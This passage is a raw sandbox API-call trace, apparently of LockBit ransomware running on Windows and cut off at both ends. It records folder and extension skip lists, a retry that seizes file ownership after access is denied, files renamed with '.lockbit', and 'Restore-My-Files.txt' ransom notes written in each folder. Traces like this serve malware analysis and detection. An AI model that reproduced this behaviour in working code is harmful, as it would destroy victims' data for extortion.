lpString2=".lockbit") returned 1 [0076.958] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.lockbit")) returned 1 [0076.959] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0076.959] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0076.959] malloc (_Size=0x40068) returned 0x206b860 [0076.959] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=791686) returned 1 [0076.959] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0076.970] GetLastError () returned 0x3e5 [0076.970] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0076.970] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0076.970] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0076.998] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0076.998] malloc (_Size=0x40068) returned 0x206b860 [0076.998] WriteFile (in: hFile=0x3b0, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0077.003] GetLastError () returned 0x3e5 [0077.003] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0077.003] lstrcmpiW (lpString1=".", lpString2="ar-SA") returned -1 [0077.003] lstrcmpiW (lpString1="..", lpString2="ar-SA") returned -1 [0077.003] lstrcmpiW (lpString1="ar-SA", lpString2="$windows.~bt") returned 1 [0077.003] lstrcmpiW (lpString1="ar-SA", lpString2="intel") returned -1 [0077.003] lstrcmpiW (lpString1="ar-SA", lpString2="msocache") returned -1 [0077.003] lstrcmpiW (lpString1="ar-SA", lpString2="$recycle.bin") returned 1 [0077.003] lstrcmpiW (lpString1="ar-SA", lpString2="$windows.~ws") returned 1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="tor browser") returned -1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="boot") returned -1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="system volume information") returned -1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="perflogs") returned -1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="google") returned -1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="application data") returned 1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="windows") returned -1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="windows.old") returned -1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="appdata") returned 1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="Windows nt") returned -1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="Msbuild") returned -1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="Microsoft") returned -1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="All users") returned 1 [0077.004] lstrcmpiW (lpString1="ar-SA", lpString2="mozilla") returned -1 [0077.004] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA") returned 57 [0077.004] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*") returned 59 [0077.004] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0077.005] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.005] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0077.005] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0077.005] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.005] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0077.005] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0077.005] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0077.005] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0077.006] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0077.006] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0077.006] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0077.006] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0077.006] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0077.006] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.006] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0077.007] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0077.007] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0077.007] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0077.007] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0077.007] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0077.007] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0077.007] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0077.007] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0077.007] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.007] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0077.007] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0077.007] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0077.007] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0077.007] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0077.007] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\") returned="" [0077.008] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned=".mui" [0077.008] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0077.008] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0077.008] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0077.008] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0077.008] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0077.008] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0077.008] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0077.008] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0077.009] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0077.009] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0077.009] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0077.009] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0077.009] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0077.009] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0077.009] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.lockbit") returned 81 [0077.009] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.009] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.lockbit")) returned 0 [0077.010] GetLastError () returned 0x5 [0077.011] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.011] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.011] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.011] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.011] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.012] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.012] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.012] NtQueryInformationFile (in: FileHandle=0x3b4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0077.021] NtClose (Handle=0x3b4) returned 0x0 [0077.021] RtlFreeAnsiString (AnsiString="\\") [0077.021] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b4) returned 1 [0077.021] malloc (_Size=0x200) returned 0x53fcc0 [0077.022] GetTokenInformation (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0077.022] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.022] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.022] CloseHandle (hObject=0x3b4) returned 1 [0077.022] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0077.022] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0077.023] free (_Block=0x53fcc0) [0077.023] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.023] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.lockbit")) returned 1 [0077.024] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0077.024] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.024] malloc (_Size=0x40068) returned 0x206b860 [0077.024] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=3584) returned 1 [0077.024] ReadFile (in: hFile=0x3b4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0077.033] GetLastError () returned 0x3e5 [0077.033] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA") returned 1 [0077.033] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\Restore-My-Files.txt") returned 78 [0077.033] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0077.034] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.034] malloc (_Size=0x40068) returned 0x206b860 [0077.034] WriteFile (in: hFile=0x3b4, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0077.038] GetLastError () returned 0x3e5 [0077.038] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe846a08f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe86330eb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe8659248, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0077.038] GetLastError () returned 0x12 [0077.038] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0077.038] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0077.038] lstrcmpiW (lpString1=".", lpString2="bg-BG") returned -1 [0077.038] lstrcmpiW (lpString1="..", lpString2="bg-BG") returned -1 [0077.038] lstrcmpiW (lpString1="bg-BG", lpString2="$windows.~bt") returned 1 [0077.038] lstrcmpiW (lpString1="bg-BG", lpString2="intel") returned -1 [0077.038] lstrcmpiW (lpString1="bg-BG", lpString2="msocache") returned -1 [0077.038] lstrcmpiW (lpString1="bg-BG", lpString2="$recycle.bin") returned 1 [0077.038] lstrcmpiW (lpString1="bg-BG", lpString2="$windows.~ws") returned 1 [0077.038] lstrcmpiW (lpString1="bg-BG", lpString2="tor browser") returned -1 [0077.038] lstrcmpiW (lpString1="bg-BG", lpString2="boot") returned -1 [0077.038] lstrcmpiW (lpString1="bg-BG", lpString2="system volume information") returned -1 [0077.038] lstrcmpiW (lpString1="bg-BG", lpString2="perflogs") returned -1 [0077.038] lstrcmpiW (lpString1="bg-BG", lpString2="google") returned -1 [0077.039] lstrcmpiW (lpString1="bg-BG", lpString2="application data") returned 1 [0077.039] lstrcmpiW (lpString1="bg-BG", lpString2="windows") returned -1 [0077.039] lstrcmpiW (lpString1="bg-BG", lpString2="windows.old") returned -1 [0077.039] lstrcmpiW (lpString1="bg-BG", lpString2="appdata") returned 1 [0077.039] lstrcmpiW (lpString1="bg-BG", lpString2="Windows nt") returned -1 [0077.039] lstrcmpiW (lpString1="bg-BG", lpString2="Msbuild") returned -1 [0077.039] lstrcmpiW (lpString1="bg-BG", lpString2="Microsoft") returned -1 [0077.039] lstrcmpiW (lpString1="bg-BG", lpString2="All users") returned 1 [0077.039] lstrcmpiW (lpString1="bg-BG", lpString2="mozilla") returned -1 [0077.039] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG") returned 57 [0077.039] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*") returned 59 [0077.039] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0077.040] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.040] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0077.040] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0077.040] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0077.040] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1207ac, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea335ac2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea35bc1f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0077.040] lstrcmpiW (lpString1=".", lpString2="tipresx.dll.mui") returned -1 [0077.040] lstrcmpiW (lpString1="..", lpString2="tipresx.dll.mui") returned -1 [0077.040] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0077.040] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0077.040] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0077.040] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0077.040] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0077.040] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0077.040] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0077.040] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0077.040] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0077.040] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0077.040] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0077.040] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0077.040] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0077.040] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0077.040] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0077.041] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0077.041] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0077.041] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0077.041] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0077.041] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0077.041] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0077.041] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0077.041] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0077.041] 